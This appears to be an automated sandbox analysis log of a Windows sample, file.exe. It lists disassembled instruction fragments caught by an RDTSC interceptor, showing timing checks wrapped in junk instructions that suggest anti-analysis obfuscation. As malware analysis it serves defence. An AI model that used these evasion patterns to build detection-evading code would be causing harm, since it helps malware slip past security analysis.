                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104FF second address: 4A10503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10503 second address: 4A10507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10507 second address: 4A1050D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1050D second address: 4A10513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10513 second address: 4A10517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10517 second address: 4A10550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CEB1B21h 0x00000012 and si, 74B6h 0x00000017 jmp 00007F7E2CEB1B21h 0x0000001c popfd 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10550 second address: 4A10556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10556 second address: 4A1055A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1055A second address: 4A1057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov esi, 61B81D6Dh 0x00000011 mov cx, 2369h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, edx 0x0000001d mov esi, ebx 0x0000001f popad 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1057A second address: 4A105AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B27h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20EDF second address: 4A20F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Dh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20F04 second address: 4A20F3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CEB1B1Dh 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30206 second address: 4A3020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3020C second address: 4A30224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30224 second address: 4A30236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30236 second address: 4A3025D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B25h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50650 second address: 4A50660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50660 second address: 4A5068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7E2CEB1B26h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5068F second address: 4A506B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 562CD845h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 pushad 0x00000011 mov di, 1D3Eh 0x00000015 mov si, di 0x00000018 popad 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A506B0 second address: 4A506B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A506B4 second address: 4A506CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A506CE second address: 4A50757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [777265FCh] 0x0000000e jmp 00007F7E2CEB1B26h 0x00000013 test eax, eax 0x00000015 jmp 00007F7E2CEB1B20h 0x0000001a je 00007F7E9FB04D72h 0x00000020 jmp 00007F7E2CEB1B20h 0x00000025 mov ecx, eax 0x00000027 jmp 00007F7E2CEB1B20h 0x0000002c xor eax, dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F7E2CEB1B1Ah 0x00000038 or al, 00000058h 0x0000003b jmp 00007F7E2CEB1B1Bh 0x00000040 popfd 0x00000041 mov si, FE0Fh 0x00000045 popad 0x00000046 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50757 second address: 4A507D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEC3D3Bh 0x00000009 sub cx, C81Eh 0x0000000e jmp 00007F7E2CEC3D49h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 and ecx, 1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7E2CEC3D3Fh 0x00000025 and eax, 5478722Eh 0x0000002b jmp 00007F7E2CEC3D49h 0x00000030 popfd 0x00000031 call 00007F7E2CEC3D40h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A507D2 second address: 4A5081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, ebx 0x00000010 pushfd 0x00000011 jmp 00007F7E2CEB1B29h 0x00000016 sub cx, A276h 0x0000001b jmp 00007F7E2CEB1B21h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5081F second address: 4A50839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50839 second address: 4A5087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, B94Fh 0x00000008 popad 0x00000009 mov dx, ax 0x0000000c popad 0x0000000d retn 0004h 0x00000010 nop 0x00000011 mov esi, eax 0x00000013 lea eax, dword ptr [ebp-08h] 0x00000016 xor esi, dword ptr [002A2014h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push eax 0x0000001f lea eax, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 call 00007F7E316A229Fh 0x00000028 push FFFFFFFEh 0x0000002a pushad 0x0000002b mov al, 0Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F7E2CEB1B1Fh 0x00000035 and ah, 0000000Eh 0x00000038 jmp 00007F7E2CEB1B29h 0x0000003d popfd 0x0000003e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5087D second address: 4A5088E instructions: 0x00000000 rdtsc 0x00000002 mov si, B217h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov ax, CD0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5088E second address: 4A508B1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ret 0x00000008 nop 0x00000009 push eax 0x0000000a call 00007F7E316A22E5h 0x0000000f mov edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CEB1B25h 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508B1 second address: 4A508B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508B7 second address: 4A508EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7E2CEB1B20h 0x0000000f push eax 0x00000010 jmp 00007F7E2CEB1B1Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c push ecx 0x0000001d pop edx 0x0000001e popad 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A508EE second address: 4A50904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Ah 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50904 second address: 4A5091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5091A second address: 4A50920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50920 second address: 4A50926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50926 second address: 4A5092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0009C second address: 4A000C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CEB1B1Dh 0x00000009 jmp 00007F7E2CEB1B1Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000C6 second address: 4A000CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000CB second address: 4A000FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebp 0x0000000a jmp 00007F7E2CEB1B1Eh 0x0000000f mov dword ptr [esp], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEB1B27h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000FF second address: 4A0014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7E2CEC3D3Eh 0x0000000f push eax 0x00000010 jmp 00007F7E2CEC3D3Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7E2CEC3D45h 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0014F second address: 4A00196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d jmp 00007F7E2CEB1B1Ch 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F7E2CEB1B1Ch 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CEB1B1Dh 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00196 second address: 4A0019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0019C second address: 4A001B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B23h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001B3 second address: 4A001B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001B7 second address: 4A001E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, 12ADh 0x00000010 pushfd 0x00000011 jmp 00007F7E2CEB1B1Ah 0x00000016 sbb ecx, 6CC70D48h 0x0000001c jmp 00007F7E2CEB1B1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001E5 second address: 4A001EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001EA second address: 4A00238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov edx, 7A4DBE90h 0x00000013 jmp 00007F7E2CEB1B29h 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F7E2CEB1B1Eh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7E2CEB1B1Dh 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00238 second address: 4A0023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0023E second address: 4A002BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov dl, ch 0x0000000d pushfd 0x0000000e jmp 00007F7E2CEB1B23h 0x00000013 xor ax, 87AEh 0x00000018 jmp 00007F7E2CEB1B29h 0x0000001d popfd 0x0000001e popad 0x0000001f test esi, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 mov cl, 32h 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F7E2CEB1B1Bh 0x0000002f jmp 00007F7E2CEB1B23h 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F7E9FB4FE7Ah 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002BD second address: 4A002C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002C1 second address: 4A002DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002DC second address: 4A0030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7E2CEC3D3Ah 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0030D second address: 4A00311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00311 second address: 4A00360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7E2CEC3D40h 0x0000000c xor ecx, 44E86B78h 0x00000012 jmp 00007F7E2CEC3D3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 je 00007F7E9FB62026h 0x0000001f jmp 00007F7E2CEC3D46h 0x00000024 mov edx, dword ptr [esi+44h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00360 second address: 4A00364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00364 second address: 4A00381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00381 second address: 4A00387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00387 second address: 4A0038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F06E4 second address: 49F06F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F06F3 second address: 49F0718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0718 second address: 49F071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F071D second address: 49F0742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 93h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7E2CEC3D43h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov si, DE11h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0742 second address: 49F07A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEB1B1Ch 0x0000000b popad 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 movzx esi, bx 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, 554EEB57h 0x0000001d mov eax, 0D6CE5F3h 0x00000022 popad 0x00000023 mov dword ptr [esp], ebx 0x00000026 jmp 00007F7E2CEB1B26h 0x0000002b xchg eax, esi 0x0000002c jmp 00007F7E2CEB1B20h 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ebx, esi 0x00000036 popad 0x00000037 mov edx, ecx 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07A6 second address: 49F07AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07AC second address: 49F07E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F7E2CEB1B20h 0x00000011 sub ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7E2CEB1B1Ch 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07E7 second address: 49F0865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7E2CEC3D44h 0x00000012 jmp 00007F7E2CEC3D45h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F7E2CEC3D40h 0x0000001e or eax, 3DBF26D8h 0x00000024 jmp 00007F7E2CEC3D3Bh 0x00000029 popfd 0x0000002a popad 0x0000002b je 00007F7E9FB6987Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F7E2CEC3D45h 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0865 second address: 49F0897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F7E2CEB1B27h 0x0000001a pop ecx 0x0000001b mov bx, DCDCh 0x0000001f popad 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0897 second address: 49F089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F089D second address: 49F08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08A1 second address: 49F08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F7E2CEC3D3Dh 0x00000014 pop ecx 0x00000015 mov ax, bx 0x00000018 popad 0x00000019 je 00007F7E9FB69810h 0x0000001f jmp 00007F7E2CEC3D43h 0x00000024 test byte ptr [77726968h], 00000002h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08EF second address: 49F08F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08F3 second address: 49F08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08F9 second address: 49F08FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F08FF second address: 49F092E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F7E9FB697E5h 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov edi, 6D6433CEh 0x00000017 popad 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7E2CEC3D41h 0x00000023 rdtsc
